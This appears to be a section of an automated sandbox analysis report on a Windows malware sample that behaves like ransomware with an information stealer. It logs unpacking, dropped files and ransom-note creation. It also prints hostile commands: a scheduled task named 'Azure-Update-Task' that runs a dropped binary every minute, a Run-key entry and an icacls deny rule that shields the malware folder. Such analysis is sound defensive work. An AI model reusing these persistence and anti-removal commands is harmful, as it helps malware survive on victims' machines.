            Source: C:\Windows\explorer.exeSection loaded: cryptbase.dll
            Source: C:\Windows\explorer.exeSection loaded: provsvc.dll
            Source: C:\Windows\explorer.exeSection loaded: holographicextensions.dll
            Source: C:\Windows\explorer.exeSection loaded: virtualmonitormanager.dll
            Source: C:\Windows\explorer.exeSection loaded: resourcepolicyclient.dll
            Source: C:\Windows\explorer.exeSection loaded: ehstorshell.dll
            Source: C:\Windows\explorer.exeSection loaded: cscui.dll
            Source: C:\Windows\explorer.exeSection loaded: windows.ui.immersive.dll
            Source: C:\Windows\explorer.exeSection loaded: abovelockapphost.dll
            Source: C:\Windows\explorer.exeSection loaded: npsm.dll
            Source: C:\Windows\explorer.exeSection loaded: windows.web.dll
            Source: C:\Windows\explorer.exeSection loaded: windows.shell.bluelightreduction.dll
            Source: C:\Windows\explorer.exeSection loaded: mscms.dll
            Source: C:\Windows\explorer.exeSection loaded: coloradapterclient.dll
            Source: C:\Windows\explorer.exeSection loaded: windows.internal.signals.dll
            Source: C:\Windows\explorer.exeSection loaded: tdh.dll
            Source: C:\Windows\explorer.exeSection loaded: windows.staterepositorybroker.dll
            Source: C:\Windows\explorer.exeSection loaded: iconcodecservice.dll
            Source: C:\Windows\explorer.exeSection loaded: mfplat.dll
            Source: C:\Windows\explorer.exeSection loaded: rtworkq.dll
            Source: C:\Windows\explorer.exeSection loaded: taskflowdataengine.dll
            Source: C:\Windows\explorer.exeSection loaded: actxprxy.dll
            Source: C:\Windows\explorer.exeSection loaded: structuredquery.dll
            Source: C:\Windows\explorer.exeSection loaded: windows.security.authentication.web.core.dll
            Source: C:\Windows\explorer.exeSection loaded: windows.data.activities.dll
            Source: C:\Windows\explorer.exeSection loaded: windows.system.launcher.dll
            Source: C:\Windows\explorer.exeSection loaded: windows.shell.servicehostbuilder.dll
            Source: C:\Windows\explorer.exeSection loaded: windows.internal.ui.shell.windowtabmanager.dll
            Source: C:\Windows\explorer.exeSection loaded: notificationcontrollerps.dll
            Source: C:\Windows\explorer.exeSection loaded: windows.devices.enumeration.dll
            Source: C:\Windows\explorer.exeSection loaded: windows.globalization.dll
            Source: C:\Windows\explorer.exeSection loaded: icu.dll
            Source: C:\Windows\explorer.exeSection loaded: mswb7.dll
            Source: C:\Windows\explorer.exeSection loaded: devdispitemprovider.dll
            Source: C:\Windows\explorer.exeSection loaded: windows.networking.connectivity.dll
            Source: C:\Windows\explorer.exeSection loaded: windows.ui.core.textinput.dll
            Source: C:\Windows\explorer.exeSection loaded: uianimation.dll
            Source: C:\Windows\explorer.exeSection loaded: windowsudk.shellcommon.dll
            Source: C:\Windows\explorer.exeSection loaded: dictationmanager.dll
            Source: C:\Windows\explorer.exeSection loaded: npmproxy.dll
            Source: C:\Windows\explorer.exeSection loaded: ondemandconnroutehelper.dll
            Source: C:\Windows\explorer.exeSection loaded: winhttp.dll
            Source: C:\Windows\explorer.exeSection loaded: mswsock.dll
            Source: C:\Windows\explorer.exeSection loaded: winnsi.dll
            Source: C:\Windows\explorer.exeSection loaded: dnsapi.dll
            Source: C:\Windows\explorer.exeSection loaded: rasadhlp.dll
            Source: C:\Windows\explorer.exeSection loaded: fwpuclnt.dll
            Source: C:\Windows\explorer.exeSection loaded: schannel.dll
            Source: C:\Windows\explorer.exeSection loaded: mskeyprotect.dll
            Source: C:\Windows\explorer.exeSection loaded: ntasn1.dll
            Source: C:\Windows\explorer.exeSection loaded: ncrypt.dll
            Source: C:\Windows\explorer.exeSection loaded: ncryptsslp.dll
            Source: C:\Windows\explorer.exeSection loaded: msasn1.dll
            Source: C:\Windows\explorer.exeSection loaded: dpapi.dll
            Source: C:\Windows\explorer.exeSection loaded: rsaenh.dll
            Source: C:\Windows\explorer.exeSection loaded: gpapi.dll
            Source: C:\Windows\explorer.exeSection loaded: taskschd.dll
            Source: C:\Windows\explorer.exeSection loaded: stobject.dll
            Source: C:\Windows\explorer.exeSection loaded: wmiclnt.dll
            Source: C:\Windows\explorer.exeSection loaded: workfoldersshell.dll
            Source: C:\Windows\explorer.exeSection loaded: windows.fileexplorer.common.dll
            Source: C:\Windows\explorer.exeSection loaded: pcshellcommonproxystub.dll
            Source: C:\Windows\explorer.exeSection loaded: cryptngc.dll
            Source: C:\Windows\explorer.exeSection loaded: cflapi.dll
            Source: C:\Windows\explorer.exeSection loaded: execmodelproxy.dll
            Source: C:\Windows\explorer.exeSection loaded: daxexec.dll
            Source: C:\Windows\explorer.exeSection loaded: container.dll
            Source: C:\Windows\explorer.exeSection loaded: shellcommoncommonproxystub.dll
            Source: C:\Windows\explorer.exeSection loaded: uiautomationcore.dll
            Source: C:\Windows\explorer.exeSection loaded: samlib.dll
            Source: C:\Windows\explorer.exeSection loaded: capabilityaccessmanagerclient.dll
            Source: C:\Windows\explorer.exeSection loaded: batmeter.dll
            Source: C:\Windows\explorer.exeSection loaded: sxs.dll
            Source: C:\Windows\explorer.exeSection loaded: inputswitch.dll
            Source: C:\Windows\explorer.exeSection loaded: windows.ui.shell.dll
            Source: C:\Windows\explorer.exeSection loaded: es.dll
            Source: C:\Windows\explorer.exeSection loaded: prnfldr.dll
            Source: C:\Windows\explorer.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{603D3801-BD81-11d0-A3A5-00C04FD706EC}\InProcServer32Jump to behavior
            Source: Window RecorderWindow detected: More than 3 window changes detected
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Windows\SysWOW64\msvcr100.dllJump to behavior
            Source: file.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
            Source: Binary string: E:\Doc\My work (C++)\_Git\Encryption\Release\encrypt_win_api.pdb source: E609.exe, E609.exe, 0000000F.00000002.2873162135.0000000000400000.00000040.00000400.00020000.00000000.sdmp, E609.exe, 00000010.00000002.2077051792.00000000049E0000.00000040.00001000.00020000.00000000.sdmp, E609.exe, 00000011.00000002.2873470043.0000000000400000.00000040.00000400.00020000.00000000.sdmp, E609.exe, 00000019.00000002.2186742765.0000000004A70000.00000040.00001000.00020000.00000000.sdmp, E609.exe, 0000001B.00000002.2211120304.0000000000400000.00000040.00000400.00020000.00000000.sdmp, E609.exe, 0000001F.00000002.2266971281.0000000004A80000.00000040.00001000.00020000.00000000.sdmp, E609.exe, 00000021.00000002.2275243210.0000000000400000.00000040.00000400.00020000.00000000.sdmp
            Source: Binary string: mozglue.pdbP source: build2.exe, 00000013.00000002.2708700605.000000006C8CD000.00000002.00000001.01000000.0000000E.sdmp
            Source: Binary string: nss3.pdb@ source: build2.exe, 00000013.00000002.2709463874.000000006CA8F000.00000002.00000001.01000000.0000000D.sdmp
            Source: Binary string: C:\bup-mage85\kuvovipor\soxecexar-kavah95\wibaju90_tavi60 p.pdb source: build3.exe, 0000001A.00000000.2156846013.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, build3.exe, 0000001A.00000002.2242852483.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, build3.exe, 0000001C.00000000.2241978296.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, mstsca.exe, 00000020.00000002.2340193877.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, mstsca.exe, 00000020.00000000.2255717001.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, mstsca.exe, 00000023.00000000.2339511009.0000000000401000.00000020.00000001.01000000.0000000C.sdmp
            Source: Binary string: E:\Doc\My work (C++)\_Git\Encryption\Release\encrypt_win_api.pdbI source: E609.exe, 00000009.00000002.2029153716.0000000004A10000.00000040.00001000.00020000.00000000.sdmp, E609.exe, 0000000A.00000002.2053427513.0000000000400000.00000040.00000400.00020000.00000000.sdmp, E609.exe, 0000000E.00000002.2060401394.0000000004A70000.00000040.00001000.00020000.00000000.sdmp, E609.exe, 0000000F.00000002.2873162135.0000000000400000.00000040.00000400.00020000.00000000.sdmp, E609.exe, 00000010.00000002.2077051792.00000000049E0000.00000040.00001000.00020000.00000000.sdmp, E609.exe, 00000011.00000002.2873470043.0000000000400000.00000040.00000400.00020000.00000000.sdmp, E609.exe, 00000019.00000002.2186742765.0000000004A70000.00000040.00001000.00020000.00000000.sdmp, E609.exe, 0000001B.00000002.2211120304.0000000000400000.00000040.00000400.00020000.00000000.sdmp, E609.exe, 0000001F.00000002.2266971281.0000000004A80000.00000040.00001000.00020000.00000000.sdmp, E609.exe, 00000021.00000002.2275243210.0000000000400000.00000040.00000400.00020000.00000000.sdmp
            Source: Binary string: nss3.pdb source: build2.exe, 00000013.00000002.2709463874.000000006CA8F000.00000002.00000001.01000000.0000000D.sdmp
            Source: Binary string: C:\Users\Dan\Desktop\work\sqlite\tmp\sqlite_bld_dir\2\sqlite3.pdb source: build2.exe, 00000013.00000002.2690990099.000000001DDC8000.00000002.00001000.00020000.00000000.sdmp, build2.exe, 00000013.00000002.2691644987.000000002020D000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: mozglue.pdb source: build2.exe, 00000013.00000002.2708700605.000000006C8CD000.00000002.00000001.01000000.0000000E.sdmp
            Source: Binary string: HC:\bup-mage85\kuvovipor\soxecexar-kavah95\wibaju90_tavi60 p.pdb source: build3.exe, 0000001A.00000000.2156846013.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, build3.exe, 0000001A.00000002.2242852483.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, build3.exe, 0000001C.00000000.2241978296.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, mstsca.exe, 00000020.00000002.2340193877.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, mstsca.exe, 00000020.00000000.2255717001.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, mstsca.exe, 00000023.00000000.2339511009.0000000000401000.00000020.00000001.01000000.0000000C.sdmp

            Data Obfuscation

            barindex
            Source: C:\Users\user\Desktop\file.exeUnpacked PE file: 0.2.file.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.rsrc:R; vs .text:EW;
            Source: C:\Users\user\AppData\Roaming\rujtcguUnpacked PE file: 4.2.rujtcgu.400000.0.unpack .text:ER;.rdata:R;.data:W;.rsrc:R; vs .text:EW;
            Source: C:\Users\user\AppData\Local\Temp\E609.exeUnpacked PE file: 10.2.E609.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.rsrc:R;.reloc:R;
            Source: C:\Users\user\AppData\Local\Temp\E609.exeUnpacked PE file: 15.2.E609.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.rsrc:R;.reloc:R;
            Source: C:\Users\user\AppData\Local\1ce9cac5-3da6-4cd9-96d9-c6269c309230\E609.exeUnpacked PE file: 17.2.E609.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.rsrc:R;.reloc:R;
            Source: C:\Users\user\AppData\Local\100ceb86-6cb1-4744-a649-0782dee5c50c\build2.exeUnpacked PE file: 19.2.build2.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.reloc:R;
            Source: C:\Users\user\AppData\Local\1ce9cac5-3da6-4cd9-96d9-c6269c309230\E609.exeUnpacked PE file: 27.2.E609.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.rsrc:R;.reloc:R;
            Source: C:\Users\user\AppData\Local\100ceb86-6cb1-4744-a649-0782dee5c50c\build3.exeUnpacked PE file: 28.2.build3.exe.400000.0.unpack .text:ER;.data:W;.kic:W;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.reloc:R;
            Source: C:\Users\user\AppData\Local\1ce9cac5-3da6-4cd9-96d9-c6269c309230\E609.exeUnpacked PE file: 33.2.E609.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.rsrc:R;.reloc:R;
            Source: C:\Users\user\AppData\Roaming\rujtcguUnpacked PE file: 34.2.rujtcgu.400000.0.unpack .text:ER;.rdata:R;.data:W;.rsrc:R; vs .text:EW;
            Source: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exeUnpacked PE file: 35.2.mstsca.exe.400000.0.unpack .text:ER;.data:W;.kic:W;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.reloc:R;
            Source: C:\Users\user\AppData\Local\Temp\E609.exeUnpacked PE file: 10.2.E609.exe.400000.0.unpack
            Source: C:\Users\user\AppData\Local\Temp\E609.exeUnpacked PE file: 15.2.E609.exe.400000.0.unpack
            Source: C:\Users\user\AppData\Local\1ce9cac5-3da6-4cd9-96d9-c6269c309230\E609.exeUnpacked PE file: 17.2.E609.exe.400000.0.unpack
            Source: C:\Users\user\AppData\Local\100ceb86-6cb1-4744-a649-0782dee5c50c\build2.exeUnpacked PE file: 19.2.build2.exe.400000.0.unpack
            Source: C:\Users\user\AppData\Local\1ce9cac5-3da6-4cd9-96d9-c6269c309230\E609.exeUnpacked PE file: 27.2.E609.exe.400000.0.unpack
            Source: C:\Users\user\AppData\Local\100ceb86-6cb1-4744-a649-0782dee5c50c\build3.exeUnpacked PE file: 28.2.build3.exe.400000.0.unpack
            Source: C:\Users\user\AppData\Local\1ce9cac5-3da6-4cd9-96d9-c6269c309230\E609.exeUnpacked PE file: 33.2.E609.exe.400000.0.unpack
            Source: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exeUnpacked PE file: 35.2.mstsca.exe.400000.0.unpack
            Source: C:\Users\user\AppData\Local\Temp\E609.exeCode function: 10_2_00412220 GetCommandLineW,CommandLineToArgvW,PathFindFileNameW,LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,K32EnumProcesses,OpenProcess,K32EnumProcessModules,K32GetModuleBaseNameW,CloseHandle,10_2_00412220
            Source: build3.exe.15.drStatic PE information: section name: .kic
            Source: build3[1].exe.15.drStatic PE information: section name: .kic
            Source: sqls[1].dll.19.drStatic PE information: section name: .00cfg
            Source: freebl3.dll.19.drStatic PE information: section name: .00cfg
            Source: freebl3[1].dll.19.drStatic PE information: section name: .00cfg
            Source: mozglue.dll.19.drStatic PE information: section name: .00cfg
            Source: mozglue[1].dll.19.drStatic PE information: section name: .00cfg
            Source: msvcp140.dll.19.drStatic PE information: section name: .didat
            Source: msvcp140[1].dll.19.drStatic PE information: section name: .didat
            Source: nss3.dll.19.drStatic PE information: section name: .00cfg
            Source: nss3[1].dll.19.drStatic PE information: section name: .00cfg
            Source: softokn3.dll.19.drStatic PE information: section name: .00cfg
            Source: softokn3[1].dll.19.drStatic PE information: section name: .00cfg
            Source: mstsca.exe.28.drStatic PE information: section name: .kic
            Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004026D2 push ebx; ret 0_2_004026EA
            Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004026ED pushad ; ret 0_2_004026F4
            Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004026F7 push ebx; ret 0_2_00402714
            Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00402745 push edi; ret 0_2_0040276D
            Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0040273B push edi; ret 0_2_00402742
            Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00402595 push ss; ret 0_2_0040259C
            Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004027BB push edi; ret 0_2_0040276D
            Source: C:\Users\user\Desktop\file.exeCode function: 0_2_02E22822 push edi; ret 0_2_02E227D4
            Source: C:\Users\user\Desktop\file.exeCode function: 0_2_02E225FC push ss; ret 0_2_02E22603
            Source: C:\Users\user\Desktop\file.exeCode function: 0_2_02E227A2 push edi; ret 0_2_02E227A9
            Source: C:\Users\user\Desktop\file.exeCode function: 0_2_02E215A4 push AFD66869h; ret 0_2_02E215A9
            Source: C:\Users\user\Desktop\file.exeCode function: 0_2_02E227AC push edi; ret 0_2_02E227D4
            Source: C:\Users\user\Desktop\file.exeCode function: 0_2_02E22754 pushad ; ret 0_2_02E2275B
            Source: C:\Users\user\Desktop\file.exeCode function: 0_2_02E2275E push ebx; ret 0_2_02E2277B
            Source: C:\Users\user\Desktop\file.exeCode function: 0_2_02E22739 push ebx; ret 0_2_02E22751
            Source: C:\Users\user\Desktop\file.exeCode function: 0_2_02E546ED push D23524A7h; retn 0006h0_2_02E546F5
            Source: C:\Users\user\Desktop\file.exeCode function: 0_2_02E59E74 push 4843A5D1h; retf 0_2_02E59E80
            Source: C:\Users\user\Desktop\file.exeCode function: 0_2_02E5462B pushad ; iretd 0_2_02E5462C
            Source: C:\Users\user\Desktop\file.exeCode function: 0_2_02E59E3E push ecx; retf 0_2_02E59E40
            Source: C:\Users\user\Desktop\file.exeCode function: 0_2_02E59BCE push eax; iretd 0_2_02E59BCF
            Source: C:\Users\user\Desktop\file.exeCode function: 0_2_02E59DB6 push esi; iretd 0_2_02E59DB8
            Source: C:\Users\user\Desktop\file.exeCode function: 0_2_02E59DB2 push ds; retf 0_2_02E59DB4
            Source: C:\Users\user\Desktop\file.exeCode function: 0_2_02E5351E push AFD66869h; ret 0_2_02E53523
            Source: C:\Users\user\AppData\Roaming\rujtcguCode function: 4_2_004026D2 push ebx; ret 4_2_004026EA
            Source: C:\Users\user\AppData\Roaming\rujtcguCode function: 4_2_004026ED pushad ; ret 4_2_004026F4
            Source: C:\Users\user\AppData\Roaming\rujtcguCode function: 4_2_004026F7 push ebx; ret 4_2_00402714
            Source: C:\Users\user\AppData\Roaming\rujtcguCode function: 4_2_00402745 push edi; ret 4_2_0040276D
            Source: C:\Users\user\AppData\Roaming\rujtcguCode function: 4_2_0040273B push edi; ret 4_2_00402742
            Source: C:\Users\user\AppData\Roaming\rujtcguCode function: 4_2_00402595 push ss; ret 4_2_0040259C
            Source: C:\Users\user\AppData\Roaming\rujtcguCode function: 4_2_004027BB push edi; ret 4_2_0040276D
            Source: C:\Users\user\AppData\Roaming\rujtcguCode function: 4_2_02EE2822 push edi; ret 4_2_02EE27D4

            Persistence and Installation Behavior

            barindex
            Source: C:\Windows\System32\cmd.exeProcess created: reg.exe
            Source: C:\Windows\System32\cmd.exeProcess created: reg.exe
            Source: C:\Windows\System32\cmd.exeProcess created: reg.exeJump to behavior
            Source: C:\Windows\System32\cmd.exeProcess created: reg.exe
            Source: C:\Users\user\AppData\Local\100ceb86-6cb1-4744-a649-0782dee5c50c\build2.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\vcruntime140[1].dllJump to dropped file
            Source: C:\Users\user\AppData\Local\100ceb86-6cb1-4744-a649-0782dee5c50c\build2.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\nss3[1].dllJump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\E609.exeFile created: C:\Users\user\AppData\Local\100ceb86-6cb1-4744-a649-0782dee5c50c\build3.exeJump to dropped file
            Source: C:\Users\user\AppData\Local\100ceb86-6cb1-4744-a649-0782dee5c50c\build2.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\softokn3[1].dllJump to dropped file
            Source: C:\Users\user\AppData\Local\100ceb86-6cb1-4744-a649-0782dee5c50c\build2.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\freebl3[1].dllJump to dropped file
            Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Roaming\rujtcguJump to dropped file
            Source: C:\Users\user\AppData\Local\100ceb86-6cb1-4744-a649-0782dee5c50c\build2.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\mozglue[1].dllJump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\E609.exeFile created: C:\Users\user\AppData\Local\1ce9cac5-3da6-4cd9-96d9-c6269c309230\E609.exeJump to dropped file
            Source: C:\Users\user\AppData\Local\100ceb86-6cb1-4744-a649-0782dee5c50c\build2.exeFile created: C:\ProgramData\EGIJEBGDAFHI\nss3.dllJump to dropped file
            Source: C:\Users\user\AppData\Local\100ceb86-6cb1-4744-a649-0782dee5c50c\build2.exeFile created: C:\ProgramData\EGIJEBGDAFHI\mozglue.dllJump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\E609.exeFile created: C:\Users\user\AppData\Local\100ceb86-6cb1-4744-a649-0782dee5c50c\build2.exeJump to dropped file
            Source: C:\Users\user\AppData\Local\100ceb86-6cb1-4744-a649-0782dee5c50c\build2.exeFile created: C:\ProgramData\EGIJEBGDAFHI\msvcp140.dllJump to dropped file
            Source: C:\Users\user\AppData\Local\100ceb86-6cb1-4744-a649-0782dee5c50c\build2.exeFile created: C:\ProgramData\EGIJEBGDAFHI\softokn3.dllJump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\E609.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\build2[1].exeJump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\E609.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\build3[1].exeJump to dropped file
            Source: C:\Users\user\AppData\Local\100ceb86-6cb1-4744-a649-0782dee5c50c\build2.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\msvcp140[1].dllJump to dropped file
            Source: C:\Users\user\AppData\Local\100ceb86-6cb1-4744-a649-0782dee5c50c\build2.exeFile created: C:\ProgramData\EGIJEBGDAFHI\freebl3.dllJump to dropped file
            Source: C:\Users\user\AppData\Local\100ceb86-6cb1-4744-a649-0782dee5c50c\build3.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exeJump to dropped file
            Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Local\Temp\E609.exeJump to dropped file
            Source: C:\Users\user\AppData\Local\100ceb86-6cb1-4744-a649-0782dee5c50c\build2.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\sqls[1].dllJump to dropped file
            Source: C:\Users\user\AppData\Local\100ceb86-6cb1-4744-a649-0782dee5c50c\build2.exeFile created: C:\ProgramData\EGIJEBGDAFHI\vcruntime140.dllJump to dropped file
            Source: C:\Users\user\AppData\Local\100ceb86-6cb1-4744-a649-0782dee5c50c\build2.exeFile created: C:\ProgramData\EGIJEBGDAFHI\nss3.dllJump to dropped file
            Source: C:\Users\user\AppData\Local\100ceb86-6cb1-4744-a649-0782dee5c50c\build2.exeFile created: C:\ProgramData\EGIJEBGDAFHI\mozglue.dllJump to dropped file
            Source: C:\Users\user\AppData\Local\100ceb86-6cb1-4744-a649-0782dee5c50c\build2.exeFile created: C:\ProgramData\EGIJEBGDAFHI\msvcp140.dllJump to dropped file
            Source: C:\Users\user\AppData\Local\100ceb86-6cb1-4744-a649-0782dee5c50c\build2.exeFile created: C:\ProgramData\EGIJEBGDAFHI\softokn3.dllJump to dropped file
            Source: C:\Users\user\AppData\Local\100ceb86-6cb1-4744-a649-0782dee5c50c\build2.exeFile created: C:\ProgramData\EGIJEBGDAFHI\freebl3.dllJump to dropped file
            Source: C:\Users\user\AppData\Local\100ceb86-6cb1-4744-a649-0782dee5c50c\build2.exeFile created: C:\ProgramData\EGIJEBGDAFHI\vcruntime140.dllJump to dropped file
            Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Roaming\rujtcguJump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\E609.exeFile created: C:\_readme.txtJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\E609.exeFile created: C:\$WinREAgent\_readme.txtJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\E609.exeFile created: C:\$WinREAgent\Scratch\_readme.txtJump to behavior
            Source: C:\Users\user\AppData\Local\1ce9cac5-3da6-4cd9-96d9-c6269c309230\E609.exeFile created: C:\_readme.txt
            Source: C:\Users\user\AppData\Local\1ce9cac5-3da6-4cd9-96d9-c6269c309230\E609.exeFile created: C:\Users\user\_readme.txt

            Boot Survival

            barindex
            Source: C:\Users\user\AppData\Local\100ceb86-6cb1-4744-a649-0782dee5c50c\build3.exeProcess created: C:\Windows\SysWOW64\schtasks.exe /C /create /F /sc minute /mo 1 /tn "Azure-Update-Task" /tr "C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe"
            Source: C:\Users\user\AppData\Local\Temp\E609.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run SysHelperJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\E609.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run SysHelperJump to behavior

            Hooking and other Techniques for Hiding and Protection

            barindex
            Source: C:\Windows\explorer.exeFile deleted: c:\users\user\desktop\file.exeJump to behavior
            Source: C:\Windows\explorer.exeFile opened: C:\Users\user\AppData\Roaming\rujtcgu:Zone.Identifier read attributes | deleteJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\E609.exeCode function: 10_2_00481920 GetVersionExA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,FreeLibrary,GetProcAddress,GetProcAddress,GetProcAddress,FreeLibrary,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,FreeLibrary,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetTickCount,GetTickCount,GetTickCount,GetTickCount,GetTickCount,GetTickCount,GetTickCount,GetTickCount,GetTickCount,GetTickCount,CloseHandle,FreeLibrary,GlobalMemoryStatus,GetCurrentProcessId,10_2_00481920
            Source: C:\Users\user\AppData\Local\Temp\E609.exeProcess created: C:\Windows\SysWOW64\icacls.exe icacls "C:\Users\user\AppData\Local\1ce9cac5-3da6-4cd9-96d9-c6269c309230" /deny *S-1-1-0:(OI)(CI)(DE,DC)
            Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\E609.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\E609.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\100ceb86-6cb1-4744-a649-0782dee5c50c\build2.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\100ceb86-6cb1-4744-a649-0782dee5c50c\build2.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
